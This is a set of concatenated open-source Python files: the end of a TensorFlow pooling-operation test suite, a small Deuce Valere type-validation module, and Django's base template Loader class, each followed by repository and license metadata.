474.0, 475.0, 476.0] self._VerifyValues(tf.nn.avg_pool, input_sizes=[1, 8, 8, 8], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def testAvgPooling(self): for use_gpu in True, False: self._testAvgPoolValidPadding(use_gpu) self._testAvgPoolSamePadding(use_gpu) self._testAvgPoolSamePaddingNonSquareWindow(use_gpu) self._testAvgPoolSamePaddingNonSquareWindowMultiBatch(use_gpu) self._testAvgPoolValidPaddingUnevenStride(use_gpu) self._testAvgPoolSamePadding4(use_gpu) self._testAvgPoolSamePaddingPacket4(use_gpu) self._testAvgPoolSamePaddingPacket8(use_gpu) def _testMaxPoolValidPadding(self, use_gpu): expected_output = [13.0, 14.0, 15.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 3, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="VALID", expected=expected_output, use_gpu=use_gpu) def _testMaxPoolSamePadding(self, use_gpu): expected_output = [13.0, 14.0, 15.0, 16.0, 17.0, 18.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 2, 3, 3], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testMaxPoolSamePaddingNonSquareWindow(self, use_gpu): # input is: # [1.0, 2.0 # 3.0 4.0] # # Window of [x, x] should do: # # [max(1.0, 2.0), max(2.0, padded0), # max(3.0, 4.0), max(4.0, padded0)] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 2, 2, 1], ksize=[1, 1, 2, 1], strides=[1, 1, 1, 1], padding="SAME", expected=[2.0, 2.0, 4.0, 4.0], use_gpu=use_gpu) def _testMaxPoolValidPaddingUnevenStride(self, use_gpu): self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 4, 4, 1], ksize=[1, 2, 2, 1], strides=[1, 1, 2, 1], padding="VALID", expected=[6.0, 8.0, 10.0, 12.0, 14.0, 16.0], use_gpu=use_gpu) self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 4, 4, 1], ksize=[1, 2, 2, 1], strides=[1, 2, 1, 1], padding="VALID", expected=[6.0, 7.0, 8.0, 14.0, 15.0, 16.0], use_gpu=use_gpu) def _testMaxPoolSamePaddingPacket4(self, use_gpu): expected_output = [21.0, 22.0, 23.0, 24.0, 
29.0, 30.0, 31.0, 32.0, 53.0, 54.0, 55.0, 56.0, 61.0, 62.0, 63.0, 64.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 4, 4, 4], ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def _testMaxPoolSamePaddingPacket8(self, use_gpu): expected_output = [145.0, 146.0, 147.0, 148.0, 149.0, 150.0, 151.0, 152.0, 161.0, 162.0, 163.0, 164.0, 165.0, 166.0, 167.0, 168.0, 177.0, 178.0, 179.0, 180.0, 181.0, 182.0, 183.0, 184.0, 185.0, 186.0, 187.0, 188.0, 189.0, 190.0, 191.0, 192.0, 273.0, 274.0, 275.0, 276.0, 277.0, 278.0, 279.0, 280.0, 289.0, 290.0, 291.0, 292.0, 293.0, 294.0, 295.0, 296.0, 305.0, 306.0, 307.0, 308.0, 309.0, 310.0, 311.0, 312.0, 313.0, 314.0, 315.0, 316.0, 317.0, 318.0, 319.0, 320.0, 401.0, 402.0, 403.0, 404.0, 405.0, 406.0, 407.0, 408.0, 417.0, 418.0, 419.0, 420.0, 421.0, 422.0, 423.0, 424.0, 433.0, 434.0, 435.0, 436.0, 437.0, 438.0, 439.0, 440.0, 441.0, 442.0, 443.0, 444.0, 445.0, 446.0, 447.0, 448.0, 465.0, 466.0, 467.0, 468.0, 469.0, 470.0, 471.0, 472.0, 481.0, 482.0, 483.0, 484.0, 485.0, 486.0, 487.0, 488.0, 497.0, 498.0, 499.0, 500.0, 501.0, 502.0, 503.0, 504.0, 505.0, 506.0, 507.0, 508.0, 509.0, 510.0, 511.0, 512.0] self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 8, 8, 8], ksize=[1, 3, 3, 1], strides=[1, 2, 2, 1], padding="SAME", expected=expected_output, use_gpu=use_gpu) def testMaxPooling(self): for use_gpu in True, False: self._testMaxPoolValidPadding(use_gpu) self._testMaxPoolSamePadding(use_gpu) self._testMaxPoolSamePaddingNonSquareWindow(use_gpu) self._testMaxPoolValidPaddingUnevenStride(use_gpu) self._testMaxPoolSamePaddingPacket4(use_gpu) self._testMaxPoolSamePaddingPacket8(use_gpu) # Tests for DepthwiseMaxPooling on CPU only. def testDepthwiseMaxPool1x1DepthWindow1(self): # input is: # [1.0, ..., 10.0] along depth, # # We maxpool by depth in patches of 2. 
self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 1, 1, 10], ksize=[1, 1, 1, 2], strides=[1, 1, 1, 2], padding="SAME", expected=[2.0, 4.0, 6.0, 8.0, 10.0], use_gpu=False) def testDepthwiseMaxPool2x2DepthWindow3(self): # input is: # # a 2x2x6 cube, and we depthwise max across 3 to produce a 2x2x2 # output. Each node has contiguous values, so the depthwise max # should be multiples of 3.0. self._VerifyValues(tf.nn.max_pool, input_sizes=[1, 2, 2, 6], ksize=[1, 1, 1, 3], strides=[1, 1, 1, 3], padding="SAME", expected=[3.0, 6.0, 9.0, 12.0, 15.0, 18.0, 21.0, 24.0], use_gpu=False) def _testDepthwiseMaxPoolInvalidConfig(self, in_size, ksize, strides, error_msg, use_gpu=False): t = tf.constant(1.0, shape=in_size) with self.assertRaisesRegexp(ValueError, error_msg): t = tf.nn.max_pool(t, ksize=ksize, strides=strides, padding="SAME") def testDepthwiseMaxPoolInvalidConfigs(self): self._testDepthwiseMaxPoolInvalidConfig( [1, 2, 2, 4], [1, 2, 2, 2], [1, 1, 1, 2], "exactly one of pooling across depth") self._testDepthwiseMaxPoolInvalidConfig( [1, 2, 2, 4], [1, 1, 1, 2], [1, 1, 1, 1], "depth window to equal the depth stride") self._testDepthwiseMaxPoolInvalidConfig( [1, 2, 2, 4], [1, 1, 1, 3], [1, 1, 1, 3], "evenly divide") if tf.test.IsBuiltWithCuda(): with self.test_session(use_gpu=True): t = tf.constant(1.0, shape=[1, 2, 2, 4]) with self.assertRaisesOpError("for CPU devices"): tf.nn.max_pool(t, ksize=[1, 1, 1, 2], strides=[1, 1, 1, 2], padding="SAME").eval() # The following are tests that verify that the CPU and GPU implementations # produce the same resuts. 
def _CompareMaxPoolingFwd(self, input_shape, ksize, strides, padding): tensor_input = np.random.rand(*input_shape).astype(np.float32) with self.test_session(use_gpu=True): t = tf.constant(tensor_input, shape=input_shape) out_op, _ = tf.nn.max_pool_with_argmax(t, ksize, strides, padding) gpu_val = out_op.eval() with self.test_session(use_gpu=False): t = tf.constant(tensor_input, shape=input_shape) out_op = tf.nn.max_pool(t, ksize, strides, padding) cpu_val = out_op.eval() self.assertAllClose(cpu_val, gpu_val, rtol=1e-5, atol=1e-5) def _CompareMaxPoolingBk(self, input_shape, output_shape, ksize, strides, padding): # Generate numbers in a narrow range, so that there are many duplicates # in the input. tensor_input = np.random.random_integers(0, 3, input_shape).astype(np.float32) tensor_output = np.random.rand(*output_shape).astype(np.float32) with self.test_session(use_gpu=True): t = tf.constant(tensor_input, shape=input_shape) _, argmax_op = tf.nn.max_pool_with_argmax(t, ksize, strides, padding) argmax = argmax_op.eval() grad_in = tf.constant(tensor_output, shape=output_shape) out_op = gen_nn_ops._max_pool_grad_with_argmax(t, grad_in, argmax, ksize, strides, padding) gpu_val = out_op.eval() self.assertShapeEqual(gpu_val, out_op) with self.test_session(use_gpu=False): t = tf.constant(tensor_input, shape=input_shape) out_op = tf.nn.max_pool(t, ksize, strides, padding) orig_out = out_op.eval() grad_in = tf.constant(tensor_output, shape=output_shape) out_op = gen_nn_ops._max_pool_grad(t, orig_out, grad_in, ksize, strides, padding) cpu_val = out_op.eval() self.assertShapeEqual(cpu_val, out_op) self.assertAllClose(cpu_val, gpu_val, rtol=1e-5, atol=1e-5) def testMaxPoolingWithArgmax(self): # MaxPoolWithArgMax is implemented only on GPU. 
if not tf.test.IsBuiltWithCuda(): return tensor_input = [1.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0] with self.test_session(use_gpu=True) as sess: t = tf.constant(tensor_input, shape=[1, 3, 3, 1]) out_op, argmax_op = tf.nn.max_pool_with_argmax(t, ksize=[1, 2, 2, 1], strides=[1, 1, 1, 1], Targmax=tf.int64, padding="VALID") out, argmax = sess.run([out_op, argmax_op]) self.assertShapeEqual(out, out_op) self.assertShapeEqual(argmax, argmax_op) self.assertAllClose(out.ravel(), [1.0, 1.0, 1.0, 1.0]) self.assertAllEqual(argmax.ravel(), [0, 1, 3, 5]) def testMaxPoolingGradWithArgmax(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return orig_input = [1.0, 1.0, 1.0, 1.0, 0.0, 1.0, 1.0, 1.0, 1.0] tensor_input = [11.0, 12.0, 13.0, 14.0] tensor_argmax = list(np.array([0, 1, 3, 5], dtype=np.int64)) with self.test_session(use_gpu=True) as sess: orig_in = tf.constant(orig_input, shape=[1, 3, 3, 1]) t = tf.constant(tensor_input, shape=[1, 2, 2, 1]) argmax = tf.constant(tensor_argmax, shape=[1, 2, 2, 1], dtype=tf.int64) out_op = gen_nn_ops._max_pool_grad_with_argmax(orig_in, t, argmax, ksize=[1, 2, 2, 1], strides=[1, 1, 1, 1], padding="VALID") out = out_op.eval().flatten() self.assertAllClose(out, [11.0, 12.0, 0.0, 13.0, 0.0, 14.0, 0.0, 0.0, 0.0]) def _ConstructAndTestGradient(self, pool_func, input_sizes, output_sizes, window_rows, window_cols, row_stride, col_stride, padding, use_gpu, x_init_value=None): """Verifies the gradients of the avg pooling function. Args: pool_func: Function to be called, co.MaxPool, co.AvgPool, or the Lua version. input_sizes: Input tensor dimensions. output_sizes: Output tensor dimensions. window_rows: kernel size in row dim window_cols: kernel size in col dim row_stride: Row Stride. col_stride: Col Stride. padding: Padding type. use_gpu: whether we are running on GPU x_init_value: Values to be passed to the gradient checker. 
""" total_size = 1 for s in input_sizes: total_size *= s # Initializes the input tensor with array containing incrementing # numbers from 1. x = [f * 1.0 for f in range(1, total_size + 1)] with self.test_session(use_gpu=use_gpu): input_tensor = tf.constant(x, shape=input_sizes, name="input") if pool_func == tf.nn.avg_pool: func_name = "avg_pool" err_margin = 1e-4 else: if x_init_value is None: x_init_value = np.asfarray( np.arange(1, total_size + 1), dtype=np.float32).reshape(input_sizes) func_name = "max_pool" err_margin = 1e-3 t = pool_func(input_tensor, ksize=[1, window_rows, window_rows, 1], strides=[1, row_stride, col_stride, 1], padding=padding, name=func_name) err = gc.ComputeGradientError( input_tensor, input_sizes, t, output_sizes, x_init_value=x_init_value, delta=1e-2) print("%s gradient error = " % func_name, err) self.assertLess(err, err_margin) def _testMaxPoolGradValidPadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[1, 3, 3, 1], output_sizes=[1, 3, 3, 1], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradValidPadding2_1_6(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 6, 6, 3], output_sizes=[2, 5, 5, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradValidPadding2_1_7(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 7, 7, 3], output_sizes=[2, 6, 6, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradValidPadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 2, 3], output_sizes=[2, 1, 1, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradSamePadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 
4, 3], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradSamePadding2_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradSamePadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 1, 2, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradSamePadding3_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.max_pool, input_sizes=[1, 7, 7, 1], output_sizes=[1, 7, 7, 1], window_rows=3, window_cols=3, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def testMaxPoolGrad(self): for use_gpu in True, False: self._testMaxPoolGradValidPadding1_1(use_gpu=use_gpu) self._testMaxPoolGradValidPadding2_1_6(use_gpu=use_gpu) self._testMaxPoolGradValidPadding2_1_7(use_gpu=use_gpu) self._testMaxPoolGradValidPadding2_2(use_gpu=use_gpu) self._testMaxPoolGradSamePadding1_1(use_gpu=use_gpu) self._testMaxPoolGradSamePadding2_1(use_gpu=use_gpu) self._testMaxPoolGradSamePadding2_2(use_gpu=use_gpu) self._testMaxPoolGradSamePadding3_1(use_gpu=use_gpu) def _MaxPoolGrad(self, orig_input, orig_output, grad, window_rows, window_cols, row_stride, col_stride, padding): """Max Pooling Gradient. Args: orig_input: A float Tensor. The original input tensor. orig_output: A float Tensor. The original output tensor. grad: A float Tensor. The 4D (batch x rows x cols x depth) output backprop. window_rows: integer. Kernel size along rows dimension. window_cols: integer. Kernel size along cols dimension. row_stride: integer. Stride along rows dimension col_stride: integer. Stride along cols dimension padding: PoolingOpDef.Padding. Padding type. Returns: A Tensor. 
""" return gen_nn_ops._max_pool_grad( orig_input, orig_output, grad, [1, window_rows, window_cols, 1], [1, row_stride, col_stride, 1], padding) def _testMaxPoolGradDirect(self, input_data, output_backprop, expected_input_backprop, input_sizes, output_sizes, window_rows, window_cols, row_stride, col_stride, padding, use_gpu): with self.test_session(use_gpu=use_gpu) as sess: input_tensor = tf.constant(input_data, shape=input_sizes) output_tensor = tf.nn.max_pool( input_tensor, [1, window_rows, window_cols, 1], [1, row_stride, col_stride, 1], padding) output_backprop_tensor = tf.constant(output_backprop, shape=output_sizes) input_backprop_tensor = self._MaxPoolGrad( input_tensor, output_tensor, output_backprop_tensor, window_rows, window_cols, row_stride, col_stride, padding) actual_input_backprop = input_backprop_tensor.eval() self.assertShapeEqual(actual_input_backprop, input_backprop_tensor) actual_input_backprop = actual_input_backprop.flatten() actual_input_backprop = self._GetNdArray(actual_input_backprop) actual_output = output_tensor.eval().flatten() actual_output = self._GetNdArray(actual_output) self.assertAllClose(expected_input_backprop, actual_input_backprop, rtol=1e-6, atol=1e-6) def _testMaxPoolGradDirect1_1(self): input_data = [ 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0] output_backprop = [ 11.0, 12.0, 13.0, 15.0, 16.0, 17.0, 19.0, 20.0, 21.0] expected_input_backprop = [ 11.0, 12.0, 13.0, 0.0, 15.0, 16.0, 17.0, 0.0, 19.0, 20.0, 21.0, 0.0, 0.0, 0.0, 0.0, 0.0] for use_gpu in True, False: self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradDirect1_2(self): input_data = [ 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0] output_backprop = [ 11.0, 12.0, 13.0, 15.0, 16.0, 17.0, 19.0, 20.0, 21.0] 
expected_input_backprop = [ 11.0, 0.0, 25.0, 0.0, 0.0, 31.0, 0.0, 17.0, 19.0, 0.0, 41.0, 0.0, 0.0, 0.0, 0.0, 0.0] for use_gpu in True, False: self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testMaxPoolGradDirect1_3(self): input_data = [ 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0, 0.0, 0.0, 1.0, 0.0, 1.0,] output_backprop = [ 11.0, 12.0, 13.0, 14.0, 15.0, 16.0, 17.0, 18.0, 19.0, 20.0, 21.0, 22.0, 23.0, 24.0, 25.0, 26.0] expected_input_backprop = [ 54, 0.0, 62, 0.0, 0.0, 60, 0.0, 22.0, 47, 0.0, 51, 0.0, 0.0, 0.0, 0.0, 0.0,] for use_gpu in True, False: self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop, input_sizes=[1, 4, 4, 1], output_sizes=[1, 4, 4, 1], window_rows=3, window_cols=3, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testMaxPoolGradDirectWithNans2_1(self): input_data = [float("nan")] * 16 output_backprop = [ 11.0, 12.0, 13.0, 15.0, 16.0, 17.0, 19.0, 20.0, 21.0] # Test the CPU implementation, which propagates diffs in case of NaN expected_input_backprop_tf_cpu = [ 11.0, 12.0, 13.0, 0.0, 15.0, 16.0, 17.0, 0.0, 19.0, 20.0, 21.0, 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_tf_cpu, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=False) if not tf.test.IsBuiltWithCuda(): return # Test the GPU implementation that uses cudnn for now. 
# It does not propagate the diff in cases of NaNs expected_input_backprop_cudnn = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_cudnn, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=True) def _testMaxPoolGradDirectWithNans2_2(self): input_data = [float("nan")] * 16 output_backprop = [ float("nan"), 12.0, 13.0, 15.0, float("nan"), 17.0, 19.0, 20.0, float("nan")] # Test the CPU implementation, which propagates diffs in case of NaN expected_input_backprop_tf_cpu = [ float("nan"), 12.0, 13.0, 0.0, 15.0, float("nan"), 17.0, 0.0, 19.0, 20.0, float("nan"), 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_tf_cpu, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=False) if not tf.test.IsBuiltWithCuda(): return # Test the GPU implementation that uses cudnn for now. 
# It does not propagate the diff in cases of NaNs expected_input_backprop_cudnn = [ 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0] self._testMaxPoolGradDirect( input_data, output_backprop, expected_input_backprop_cudnn, input_sizes=[1, 4, 4, 1], output_sizes=[1, 3, 3, 1], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=True) def testMaxPoolGradDirect(self): self._testMaxPoolGradDirect1_1() self._testMaxPoolGradDirect1_2() self._testMaxPoolGradDirect1_3() self._testMaxPoolGradDirectWithNans2_1() self._testMaxPoolGradDirectWithNans2_2() def testAvgPoolGrad(self): for use_gpu in False, True: self._testAvgPoolGradValidPadding1_1(use_gpu) self._testAvgPoolGradValidPadding2_1(use_gpu) self._testAvgPoolGradValidPadding2_2(use_gpu) self._testAvgPoolGradSamePadding1_1(use_gpu) self._testAvgPoolGradSamePadding2_1(use_gpu) self._testAvgPoolGradSamePadding2_2(use_gpu) self._testAvgPoolGradSamePadding3_1(use_gpu) def _testAvgPoolGradValidPadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 3, 3, 3], output_sizes=[2, 3, 3, 3], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testAvgPoolGradValidPadding2_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 3, 3, 3], output_sizes=[2, 2, 2, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="VALID", use_gpu=use_gpu) def _testAvgPoolGradValidPadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 2, 3], output_sizes=[2, 1, 1, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="VALID", use_gpu=use_gpu) def _testAvgPoolGradSamePadding1_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=1, window_cols=1, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def 
_testAvgPoolGradSamePadding2_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 2, 4, 3], window_rows=2, window_cols=2, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def _testAvgPoolGradSamePadding2_2(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[2, 2, 4, 3], output_sizes=[2, 1, 2, 3], window_rows=2, window_cols=2, row_stride=2, col_stride=2, padding="SAME", use_gpu=use_gpu) def _testAvgPoolGradSamePadding3_1(self, use_gpu): self._ConstructAndTestGradient( tf.nn.avg_pool, input_sizes=[1, 7, 7, 1], output_sizes=[1, 7, 7, 1], window_rows=3, window_cols=3, row_stride=1, col_stride=1, padding="SAME", use_gpu=use_gpu) def testShapeFunctionEdgeCases(self): # All shapes unknown. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool]: p = tf.nn.max_pool(tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME") self.assertEqual([None, None, None, None], p.get_shape().as_list()) p, am = tf.nn.max_pool_with_argmax( tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME") self.assertEqual([None, None, None, None], p.get_shape().as_list()) self.assertEqual([None, None, None, None], am.get_shape().as_list()) # Incorrect input shape. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaises(ValueError): pool_func(tf.placeholder(tf.float32, shape=[1, 3]), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 1], padding="SAME") # Illegal strides. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaisesRegexp(ValueError, "strides in the batch"): pool_func(tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[2, 1, 1, 1], padding="SAME") with self.assertRaisesRegexp(ValueError, "strides in the batch and depth"): tf.nn.avg_pool(tf.placeholder(tf.float32), ksize=[1, 1, 1, 1], strides=[1, 1, 1, 2], padding="SAME") # Filter larger than input. 
for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaisesRegexp(ValueError, "filter must not be larger than the input"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 20, 21, 1], strides=[1, 1, 1, 1], padding="SAME") with self.assertRaisesRegexp(ValueError, "filter must not be larger than the input"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 21, 20, 1], strides=[1, 1, 1, 1], padding="SAME") # Stride larger than filter. for pool_func in [tf.nn.max_pool, tf.nn.avg_pool, tf.nn.max_pool_with_argmax]: with self.assertRaisesRegexp( ValueError, "stride must be less than or equal to filter"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 5, 3, 1], strides=[1, 5, 5, 1], padding="SAME") with self.assertRaisesRegexp( ValueError, "stride must be less than or equal to filter"): pool_func(tf.placeholder(tf.float32, shape=[32, 20, 20, 3]), ksize=[1, 3, 5, 1], strides=[1, 5, 5, 1], padding="SAME") def GetMaxPoolFwdTest(input_size, filter_size, strides, padding): def Test(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return self._CompareMaxPoolingFwd(input_size, filter_size, strides, padding) return Test def GetMaxPoolGradTest(input_size, filter_size, output_size, strides, padding): def Test(self): # MaxPoolWithArgMax is implemented only on GPU. if not tf.test.IsBuiltWithCuda(): return self._CompareMaxPoolingBk(input_size, output_size, filter_size, strides, padding) return Test if __name__ == "__main__": for (name_, input_size_, filter_size_, output_size_, stride_, padding_) in GetInceptionMaxPoolShapes(): setattr(PoolingTest, "testMaxPoolFwd_" + name_, GetMaxPoolFwdTest(input_size_, filter_size_, stride_, padding_)) setattr(PoolingTest, "testMaxPoolGrad_" + name_, GetMaxPoolGradTest(input_size_, filter_size_, output_size_, stride_, padding_)) tf.test.main()
apache-2.0
rackerlabs/deuce-valere
deucevalere/common/validation.py
1
1337
""" Deuce Valere - Common - Validation """ import datetime from deuceclient.api import * from deuceclient.auth.base import AuthenticationBase from deuceclient.client.deuce import DeuceClient from deuceclient.common.validation import * from deuceclient.common.validation_instance import * from stoplight import Rule, ValidationFailed, validation_function @validation_function def val_authenticator_instance(value): if not isinstance(value, AuthenticationBase): raise ValidationFailed('authenticator must be derived from ' 'deuceclient.auth.base.AuthenticationBase') @validation_function def val_deuceclient_instance(value): if not isinstance(value, DeuceClient): raise ValidationFailed('invalid Deuce Client instance') @validation_function def val_expire_age(value): if not isinstance(value, datetime.timedelta): raise ValidationFailed('must be type datetime.timedelta') def _abort(error_code): abort_errors = { 100: TypeError } raise abort_errors[error_code] AuthEngineRule = Rule(val_authenticator_instance(), lambda: _abort(100)) ClientRule = Rule(val_deuceclient_instance(), lambda: _abort(100)) ExpireAgeRule = Rule(val_expire_age(), lambda: _abort(100)) ExpireAgeRuleNoneOkay = Rule(val_expire_age(none_ok=True), lambda: _abort(100))
apache-2.0
KokareIITP/django
django/template/loaders/base.py
137
3887
import warnings

from django.template import Origin, Template, TemplateDoesNotExist
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.inspect import func_supports_parameter


class Loader(object):
    """Base class for template loaders.

    Subclasses implement get_template_sources() and get_contents() (modern
    API) or load_template_source() (deprecated API); this class provides the
    shared template-resolution logic on top of them.
    """

    # Only used to raise a deprecation warning. Remove in Django 1.10.
    is_usable = False

    _accepts_engine_in_init = True

    def __init__(self, engine):
        # The template Engine this loader belongs to; used when
        # instantiating Template objects.
        self.engine = engine

    def __call__(self, template_name, template_dirs=None):
        # RemovedInDjango20Warning: Allow loaders to be called like functions.
        return self.load_template(template_name, template_dirs)

    def get_template(self, template_name, template_dirs=None, skip=None):
        """
        Calls self.get_template_sources() and returns a Template object for
        the first template matching template_name. If skip is provided,
        template origins in skip are ignored. This is used to avoid recursion
        during template extending.
        """
        # Collect (origin, reason) pairs for every candidate we reject, so
        # the final TemplateDoesNotExist can report everything that was tried.
        tried = []

        args = [template_name]
        # RemovedInDjango20Warning: Add template_dirs for compatibility with
        # old loaders
        if func_supports_parameter(self.get_template_sources, 'template_dirs'):
            args.append(template_dirs)

        for origin in self.get_template_sources(*args):
            if skip is not None and origin in skip:
                tried.append((origin, 'Skipped'))
                continue

            try:
                contents = self.get_contents(origin)
            except TemplateDoesNotExist:
                tried.append((origin, 'Source does not exist'))
                continue
            else:
                # First readable source wins.
                return Template(
                    contents, origin, origin.template_name, self.engine,
                )

        raise TemplateDoesNotExist(template_name, tried=tried)

    def load_template(self, template_name, template_dirs=None):
        # Deprecated entry point kept for backward compatibility; new code
        # should call get_template() instead.
        warnings.warn(
            'The load_template() method is deprecated. Use get_template() '
            'instead.',
            RemovedInDjango20Warning,
        )
        source, display_name = self.load_template_source(
            template_name, template_dirs,
        )
        origin = Origin(
            name=display_name,
            template_name=template_name,
            loader=self,
        )

        try:
            template = Template(source, origin, template_name, self.engine)
        except TemplateDoesNotExist:
            # If compiling the template we found raises TemplateDoesNotExist,
            # back off to returning the source and display name for the
            # template we were asked to load. This allows for correct
            # identification of the actual template that does not exist.
            return source, display_name
        else:
            return template, None

    def get_template_sources(self, template_name):
        """
        An iterator that yields possible matching template paths for a
        template name.
        """
        raise NotImplementedError(
            'subclasses of Loader must provide a get_template_sources() method'
        )

    def load_template_source(self, template_name, template_dirs=None):
        """
        RemovedInDjango20Warning: Returns a tuple containing the source and
        origin for the given template name.
        """
        raise NotImplementedError(
            'subclasses of Loader must provide a load_template_source() method'
        )

    def reset(self):
        """
        Resets any state maintained by the loader instance (e.g. cached
        templates or cached loader modules).
        """
        # Default implementation is deliberately a no-op; stateful loaders
        # (e.g. the cached loader) override this.
        pass

    @property
    def supports_recursion(self):
        """
        RemovedInDjango20Warning: This is an internal property used by
        the ExtendsNode during the deprecation of non-recursive loaders.
        """
        # A loader supports the recursive API iff it implements
        # get_contents(); old-style loaders only have load_template_source().
        return hasattr(self, 'get_contents')
bsd-3-clause
